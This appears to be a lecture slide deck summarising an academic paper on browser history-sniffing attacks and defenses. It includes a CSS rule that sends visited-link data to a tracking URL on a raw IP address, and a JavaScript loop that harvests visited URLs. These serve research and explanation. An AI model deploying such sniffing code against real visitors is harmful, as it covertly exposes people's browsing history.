I Still Know What You Visited Last Summer: User interaction and
advertisement
I Still Know What You Visited Last Summer:
User interaction and side-channel attacks on
browsing history
Zachary Weinberg
Eric Y. Chen
Pavithra Ramesh Jayaraman
Collin Jackson
Carnegie Mellon University
IEEE Symposium on Security and Privacy, May 2011
2
Outline
3
Introduction
Automated Attacks
Exp 1: Interactive Attacks
Exp 2: Side-Channel Attacks
Related Work
Conclusion
Introduction
4
History Sniffing through CSS :visited
Andrew Clover, 2002,
http://seclists.org/bugtraq/2002/Feb/271
in HTML
<a id="link1" href="http://google.com/">Visit Google!</a>
in CSS
#link1:visited {
color: red;
background:
url(http://140.115.53.28/track.php?url=google.com);
}
Introduction
5
L. David Baron, 2010,
http://dbaron.org/mozilla/visited-privacy
make getComputedStyle act as though all links are unvisited
make certain CSS selectors act as though links are always
unvisited
limits the CSS properties that can be used to style visited links
to color, background-color, border-*-color, outlinecolor, column-rule-color, fill, and stroke
The latest versions of Firefox, Chrome, Safari, and IE
all adopt this defense
still vulnerable with interactive attacks
Introduction
6
Dongseok Jang et al., An Empirical Study of Privacy-
Violating Information Flows in JavaScript Web
Applications
Small sets of links (6~220) probed by real exploiters
46 popular websites, including one from Alexa Top100
This makes interactive attacks possible
Introduction
7
What can history sniffers do?
Benign:
Websites could use history sniffing to determine whether their
users have visited known phishing sites.
Websites could seed visitors’ history with URLs made up for the
purpose, and use the URLs to re-identify their visitors.
Cookies
Malicious:
Track visitors across sites for advertising purpose, determining
whether they also visit a site’s competitors.
Attackers can construct more targeted phishing pages, by
impersonating only sites that a particular victim is known to visit
Automated Attacks
8
Direct sniffing
<style> a:visited { color: red; } </style>
var url_array = new Array('http://a.com', 'http://b.com');
var visited_array = new Array();
var link_el = document.createElement('a');
var computed_style =
document.defaultView.getComputedStyle(link_el, "");
for (var i = 0; i < url_array.length; i++) {
link_el.href = array[i];
if (computed_style.getPropertyValue("color") ==
'rgb(255, 0, 0)'){
visited_array.push(url_array[i]);
}
}
Automated Attacks
9
Indirect Sniffing
Make visited and unvisited links take different amounts of
space, which causes unrelated elements on the page to move;
inspect the positions of those other elements.
Make visited and unvisited links cause different images to
load.
background-image style used in :visited rule
Not
requires JavaScript
Automated Attacks
10
Side-channel sniffing
Timing attacks
the
attacker can make the page take longer to lay out if a link is
visited than if it is unvisited
Transparent
Underline
Any other style rules in :visited
Defense
Baron’s solution does well for all 3 types (direct/indirect/sidechannel) above
Exp 1: Interactive Attacks
11
Require victims to interact with malicious sites
The authors claim that interactive attacks can be disguised as
“normal” interactive tasks that users will not find surprising or
suspicious
Amazon’s Mechanical Turk
Recruit 307 participants
All tasks in this experiment operate within the
constraints of Baron’s defense
Visited-link styles only change the color on the screen
Pretend to be CAPTCHA tests
CAPTCHA: Completely Automated Public Turing test to tell
Computers and Humans Apart
Exp 1: Interactive Attacks
12
Word CAPTCHA
1.
Each word is a hyperlink to an URL that the attacker wishes
to probe
If unvisited, it is drawn in the same color as the
background.
Exp 1: Interactive Attacks
13
2. Character CAPTCHA
Seven-segment LCD symbols
Every letter represents 3 URLs
Site-supplied font
Exp 1: Interactive Attacks
14
4+5=9;4+F=A;5+F=6;4 +5+F=8
“ – “ is always-on
Exp 1: Interactive Attacks
15
3. Chessboard puzzle
Each square contains a URL
Only the pawns corresponding
to visited sites are made visible
Using SVG or text to control
the pawns
Exp 1: Interactive Attacks
16
4. Pattern matching puzzle
Exp 1:
Interactive Attacks
17
Randomly generated task
instances corresponding
to known proportions of
visited and unvisited
links.
Exp 1: Interactive Attacks
18
Automated history-sniffing exploits on all the
participants
URL set from wtikay.com
7012 commonly visited URLs (from Alexa Top 5000)
Exp 1: Interactive Attacks
19
Exp 1: Interactive Attacks
20
Exp 1: Interactive Attacks
21
Exp 1: Interactive Attacks
22
Exp 1: Interactive Attacks
23
Exp 2: Side-channel Attacks
24
Webcam attacks
<blink>
Random 20 URLs with 10 visited ones
Variant 1:
Designed to comply with the WCAG standard for seizure safety
Variant 2:
Make entire browser window flash
Brighter color
Exp 2: Side-channel Attacks
25
Author test
100% accuracy for both variants in all condition
Will-lit room
Person stays still in front of the computer
In a dark room, accuracy dropped to 50%
Field test
60 / 307 participants
Exp 2: Side-channel Attacks
26
Field test
Exp 2: Side-channel Attacks
27
In real life,
ChatRoulette service
The attack works even when the closest reflector is a
wall 10 to 20 feet away from the monitor
Related Work
28
Page cache
Felten et al., Timing Attacks on Web Privacy
DNS cache
Felten et al., Timing Attacks on Web Privacy
Both tactics above
Only for the first time
Short-term history
Loadable cross-origin but only available to logged-in
users
Facebook, Gmail, Twitter, etc.
JavaScript onerror event
Related Work
29
Cookie, Flash Player local shared objects
Ad-blocker, Private browsing mode
Conclusion
30
Automated history sniffing attacks have successfully
been blocked by Baron’s solution
Interactive attacks are not
This paper developed POC of 6 history sniffing
exploited against Baron’s defense
4 interactive attacks
2 detection of the screen through webcam
